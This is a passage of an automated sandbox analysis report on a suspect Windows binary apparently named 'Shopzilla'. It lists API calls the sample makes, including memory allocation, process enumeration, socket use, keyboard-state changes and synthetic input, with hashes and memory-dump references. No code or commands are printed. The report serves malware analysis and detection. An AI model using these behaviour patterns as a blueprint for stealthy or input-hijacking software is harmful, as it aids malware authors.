                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: AddressLibraryLoadProc
                                              • String ID: GetNativeSystemInfo$kernel32.dll
                                              • API String ID: 2574300362-192647395
                                              • Opcode ID: 14db73e096f5bf0ff3af1f9db2253024f70fa6c4a00170a29cde1a3e042fec3a
                                              • Instruction ID: 832ef5282a039828fd1168a3afec4c188afaa7ffda75015c1804b8ddfe36c146
                                              • Opcode Fuzzy Hash: 14db73e096f5bf0ff3af1f9db2253024f70fa6c4a00170a29cde1a3e042fec3a
                                              • Instruction Fuzzy Hash: 4DD01776930B128FE7309F31C82976A76E4AF05355F21987AD486D2191E6B0C880CE91
                                              APIs
                                              • LoadLibraryA.KERNEL32(kernel32.dll,00000001,00C191A6,?,00C30980), ref: 00C195A0
                                              • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00C195B2
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: AddressLibraryLoadProc
                                              • String ID: GetModuleHandleExW$kernel32.dll
                                              • API String ID: 2574300362-199464113
                                              • Opcode ID: aee2bda4cae19d102d8a5cabce9b5a233627456668002d655b6eed08d9212b4e
                                              • Instruction ID: 4b09eba6807dac93f8ff9584f2075e436a645c6c8c26258e25ec7989beda0817
                                              • Opcode Fuzzy Hash: aee2bda4cae19d102d8a5cabce9b5a233627456668002d655b6eed08d9212b4e
                                              • Instruction Fuzzy Hash: 70D01276520712CFD7319F75D82974A76D5EF06352F218D39D896D2150D6B4C5C0CA50
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 72e95aee6af4b15ff88c053ce32aa0b18142728aab4fdaa287b733215ba99fd9
                                              • Instruction ID: a1ca02b5011c4b0fcc76657c91edd914a5ce373c4d65ac7d347df798e4526180
                                              • Opcode Fuzzy Hash: 72e95aee6af4b15ff88c053ce32aa0b18142728aab4fdaa287b733215ba99fd9
                                              • Instruction Fuzzy Hash: AAC14975A0421AEFCB14CF94C884ABABBF9FF48714B1185D9E905EB251DB30ED45CB90
                                              APIs
                                              • CharLowerBuffW.USER32(?,?), ref: 00C1E56F
                                              • CharLowerBuffW.USER32(?,?), ref: 00C1E5B2
                                                • Part of subcall function 00C1DC56: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00C1DC76
                                              • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00C1E7B2
                                              • _memmove.LIBCMT ref: 00C1E7C5
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: BuffCharLower$AllocVirtual_memmove
                                              • String ID:
                                              • API String ID: 3659485706-0
                                              • Opcode ID: 5b1867c599a6fd43a9ba5484e2afac81be61960cb44b43581f6cd03d1b4474a9
                                              • Instruction ID: 6192bd5b5bebe516260183a6b27648ee973583f77bac12d4406fae44ab9953d8
                                              • Opcode Fuzzy Hash: 5b1867c599a6fd43a9ba5484e2afac81be61960cb44b43581f6cd03d1b4474a9
                                              • Instruction Fuzzy Hash: B7C12871A083019FC714DF28C490AAABBE4FF89718F14896DF899DB351D771EA85CB81
                                              APIs
                                              • CoInitialize.OLE32(00000000), ref: 00C18575
                                              • CoUninitialize.OLE32 ref: 00C18580
                                                • Part of subcall function 00C2DC66: CoCreateInstance.OLE32(00000018,00000000,00000005,00000028,?,?,?,?,?,00000000,00000000,00000000,?,00C187D6,?,00000000), ref: 00C2DCCE
                                              • VariantInit.OLEAUT32(?), ref: 00C1858B
                                              • VariantClear.OLEAUT32(?), ref: 00C1885C
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                              • String ID:
                                              • API String ID: 780911581-0
                                              • Opcode ID: 127543054f6e47ebe8a360e159192ec14f46e9285f15c0d1b9458b6a6a1518a4
                                              • Instruction ID: aedb5b0ed371ef727a52d8e41733ab6dc0a7c51b37cfaeba47225a3aa7937d36
                                              • Opcode Fuzzy Hash: 127543054f6e47ebe8a360e159192ec14f46e9285f15c0d1b9458b6a6a1518a4
                                              • Instruction Fuzzy Hash: DCA15975608B019FD710EF14C481B5AB7E4BF8A314F148998F9999B3A1CB70FD84DB92
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: Variant$AllocClearCopyInitString
                                              • String ID:
                                              • API String ID: 2808897238-0
                                              • Opcode ID: 60dcf3089b7b5163114f603b56917e48fdd445f0f0d5c3e2917336d7449730a8
                                              • Instruction ID: 23dba7dbfe18b3b92148b844e9e409df31b691137fc96e64ec0f70c017da06fc
                                              • Opcode Fuzzy Hash: 60dcf3089b7b5163114f603b56917e48fdd445f0f0d5c3e2917336d7449730a8
                                              • Instruction Fuzzy Hash: 2C51D53069870A9ADB20AF65D8D1B3DF7E9EF55310B2098DFE646CB391DF3098888715
                                              APIs
                                              • CreateToolhelp32Snapshot.KERNEL32 ref: 00C1F2EE
                                              • Process32FirstW.KERNEL32(00000000,?), ref: 00C1F2FC
                                                • Part of subcall function 00BB1A36: _memmove.LIBCMT ref: 00BB1A77
                                              • Process32NextW.KERNEL32(00000000,?), ref: 00C1F3BC
                                              • CloseHandle.KERNEL32(00000000,?,?,?), ref: 00C1F3CB
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                              • String ID:
                                              • API String ID: 2576544623-0
                                              • Opcode ID: 3e42147f64c174577f8219ca6a6388a1d9b3d22ab9a07e99b0c8ec439c8a0a6a
                                              • Instruction ID: dba274a8e8b06a8bc8ee148ba513e8fbb8959a7795322c6fd1f7c034553bb1b6
                                              • Opcode Fuzzy Hash: 3e42147f64c174577f8219ca6a6388a1d9b3d22ab9a07e99b0c8ec439c8a0a6a
                                              • Instruction Fuzzy Hash: 54519D715083009FC310EF24D881BAFBBE8EF85700F40496DF595872A1EBB0E945CB92
                                              APIs
                                              • GetWindowRect.USER32(?,?), ref: 00C29C50
                                              • ScreenToClient.USER32(00000002,00000002), ref: 00C29C83
                                              • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00C29CF0
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: Window$ClientMoveRectScreen
                                              • String ID:
                                              • API String ID: 3880355969-0
                                              • Opcode ID: f681720799a4fba49c5745fec943fc1045652626ad2cb17323b8c98488a45a25
                                              • Instruction ID: ef847450e2894650ea2c2d0e6c56c48f0f1ac3550108f44d6efe9055e90d69d5
                                              • Opcode Fuzzy Hash: f681720799a4fba49c5745fec943fc1045652626ad2cb17323b8c98488a45a25
                                              • Instruction Fuzzy Hash: BB515131A00119AFDF24DF68D880AAE7BF6FF45320F208159F96597690D770AE41DB90
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                              • String ID:
                                              • API String ID: 2782032738-0
                                              • Opcode ID: a7c34a093fdd5ab58b6ffc98053f9d5ae49c5acda348f4cccab4e545be81f79d
                                              • Instruction ID: 215a9601f9bb3b7b63e0e23138ea6fa965beebd7507d19a0c497778619138898
                                              • Opcode Fuzzy Hash: a7c34a093fdd5ab58b6ffc98053f9d5ae49c5acda348f4cccab4e545be81f79d
                                              • Instruction Fuzzy Hash: 6041B371B006559FDF288E69C8A0FAF77F5EF85360B2485BDE85587640DBB0DE408B50
                                              APIs
                                              • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00BFA46D
                                              • __itow.LIBCMT ref: 00BFA49E
                                                • Part of subcall function 00BFA6EE: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00BFA759
                                              • SendMessageW.USER32(?,0000110A,00000001,?), ref: 00BFA507
                                              • __itow.LIBCMT ref: 00BFA55E
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: MessageSend$__itow
                                              • String ID:
                                              • API String ID: 3379773720-0
                                              • Opcode ID: 018526aca13f9342703c3bc60c36f081b74916bff4ab9e1ca16b4b62d99b5e69
                                              • Instruction ID: 591d1f77a65f729852ca05677071c482ff23af2bd65bb0ae96cf86151a2e117a
                                              • Opcode Fuzzy Hash: 018526aca13f9342703c3bc60c36f081b74916bff4ab9e1ca16b4b62d99b5e69
                                              • Instruction Fuzzy Hash: EC4175B0A0020CABDF15DF54C865BFE7BF9EB54750F404099FA05A7281DBB49948C752
                                              APIs
                                              • socket.WSOCK32(00000002,00000002,00000011), ref: 00C16E81
                                              • WSAGetLastError.WSOCK32(00000000), ref: 00C16E91
                                                • Part of subcall function 00BA4D37: __itow.LIBCMT ref: 00BA4D62
                                                • Part of subcall function 00BA4D37: __swprintf.LIBCMT ref: 00BA4DAC
                                              • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00C16EF5
                                              • WSAGetLastError.WSOCK32(00000000), ref: 00C16F01
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: ErrorLast$__itow__swprintfsocket
                                              • String ID:
                                              • API String ID: 2214342067-0
                                              • Opcode ID: 59356a118d667dab4f55cac7977ac9bddccb32cf054fe1bbfda5d086dfc7b62f
                                              • Instruction ID: a2854de6a42758e08c0910af8d4864b427ed8b453428d8263282751b9b4fd1c5
                                              • Opcode Fuzzy Hash: 59356a118d667dab4f55cac7977ac9bddccb32cf054fe1bbfda5d086dfc7b62f
                                              • Instruction Fuzzy Hash: E941C035754200AFEB20AF64DC86F6A77E49F46B14F148498FA599B3C2DBB0AD018B91
                                              APIs
                                              • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,00C30980), ref: 00C16957
                                              • _strlen.LIBCMT ref: 00C16989
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: _strlen
                                              • String ID:
                                              • API String ID: 4218353326-0
                                              • Opcode ID: 23b529b41976a01cb7bffa4cf30039443a134f8db02150fcf43e4dd38fec8567
                                              • Instruction ID: ac7d0e3fe68af9c08212c609542b258e01cc3331a16db04a96c2d8043419ba10
                                              • Opcode Fuzzy Hash: 23b529b41976a01cb7bffa4cf30039443a134f8db02150fcf43e4dd38fec8567
                                              • Instruction Fuzzy Hash: 1941B731600108AFCB14FB64DC91FFEB7E9AF45310F148199F95697292DB30AE84E790
                                              APIs
                                              • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00C0BD4E
                                              • GetLastError.KERNEL32(?,00000000), ref: 00C0BD74
                                              • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00C0BD99
                                              • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00C0BDC5
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: CreateHardLink$DeleteErrorFileLast
                                              • String ID:
                                              • API String ID: 3321077145-0
                                              • Opcode ID: d034cdecbd7edd6b7dabc73dc9834a46ca7ffa6eb28a976c809dd43f4ceeae5e
                                              • Instruction ID: 4952feeda8d219e7f3a9782171164efb268cf12c8611a96ec815a44d0a14c533
                                              • Opcode Fuzzy Hash: d034cdecbd7edd6b7dabc73dc9834a46ca7ffa6eb28a976c809dd43f4ceeae5e
                                              • Instruction Fuzzy Hash: 4D412A35200A14DFCB11EF15C485A5EBBE1EF8A310B19C4D8E95A9B362CB70FD01DB91
                                              APIs
                                              • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00C28CCB
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: InvalidateRect
                                              • String ID:
                                              • API String ID: 634782764-0
                                              • Opcode ID: c635e06a5420f454cf34427466d76523cdfc5beeef28aea47bfd096d942617d3
                                              • Instruction ID: a25a4f1a05a2f16afcf26edb0e618b8ac809019191edfce0618b9ef7b12ca4f7
                                              • Opcode Fuzzy Hash: c635e06a5420f454cf34427466d76523cdfc5beeef28aea47bfd096d942617d3
                                              • Instruction Fuzzy Hash: B231C334603139AFEF349E19EC85BAD37A4EB55310F244512F921E6AE1CF30AA5C9B91
                                              APIs
                                              • ClientToScreen.USER32(?,?), ref: 00C2AF4D
                                              • GetWindowRect.USER32(?,?), ref: 00C2AFC3
                                              • PtInRect.USER32(?,?,00C2C437), ref: 00C2AFD3
                                              • MessageBeep.USER32(00000000), ref: 00C2B044
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: Rect$BeepClientMessageScreenWindow
                                              • String ID:
                                              • API String ID: 1352109105-0
                                              • Opcode ID: 677f214287bd559127d8037ac4a34d56e8124ebbd2b1c599164ba48a822e5606
                                              • Instruction ID: 7a9a113a6101e331406073def7f887d0a726a7683bf1df3a53fc9ac67c6b5bf1
                                              • Opcode Fuzzy Hash: 677f214287bd559127d8037ac4a34d56e8124ebbd2b1c599164ba48a822e5606
                                              • Instruction Fuzzy Hash: A3418AB0600225DFCB22CF59E884BAEBBF5FF49310F1881A9E9249B651C771ED41DB91
                                              APIs
                                              • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00C01192
                                              • SetKeyboardState.USER32(00000080,?,00000001), ref: 00C011AE
                                              • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00C01214
                                              • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00C01266
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: KeyboardState$InputMessagePostSend
                                              • String ID:
                                              • API String ID: 432972143-0
                                              • Opcode ID: 4fb0b9d45634d805df6cc7f1545c5eeb64a57bf2ea394188b8007d1149d1be20
                                              • Instruction ID: a5200e3e3fcc72170ed7bc23a08662a8ee3d77fc24825db59a717056a4a6cc60
                                              • Opcode Fuzzy Hash: 4fb0b9d45634d805df6cc7f1545c5eeb64a57bf2ea394188b8007d1149d1be20
                                              • Instruction Fuzzy Hash: B1317A30984218AEFF34CA658C05BFDFB69AB45720F1C420AFDA1D21D1C3748E51DBA5
                                              APIs
                                              • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 00C012D1
                                              • SetKeyboardState.USER32(00000080,?,00008000), ref: 00C012ED
                                              • PostMessageW.USER32(00000000,00000101,00000000), ref: 00C0134C
                                              • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 00C0139E
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: KeyboardState$InputMessagePostSend
                                              • String ID:
                                              • API String ID: 432972143-0
                                              • Opcode ID: 61f29bc3af26b09702a80e63957658ef0762fb471e4417cf6802eac80bbe5831
                                              • Instruction ID: 1a7ae3174fbaf1f66c9c6e377bf3da388e8e5ca6068838c6c041bba3f4c3512f
                                              • Opcode Fuzzy Hash: 61f29bc3af26b09702a80e63957658ef0762fb471e4417cf6802eac80bbe5831
                                              • Instruction Fuzzy Hash: 38315830E446489EFF348B698C147FEFBA9AF45320F5C421AF8A0925E1C3748A95DB95
                                              APIs
                                              • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00BD635B
                                              • __isleadbyte_l.LIBCMT ref: 00BD6389
                                              • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00BD63B7
                                              • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00BD63ED
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                              • String ID:
                                              • API String ID: 3058430110-0
                                              • Opcode ID: 0c6c1b9ccaae6e7e9e84a3b9db10d220f948baad789d4eb54e28ef2f4aae0a2a
                                              • Instruction ID: dfa7c9b73f94963e6a66695cbb9f87b7bc689342888e467cab21805c6b977e61
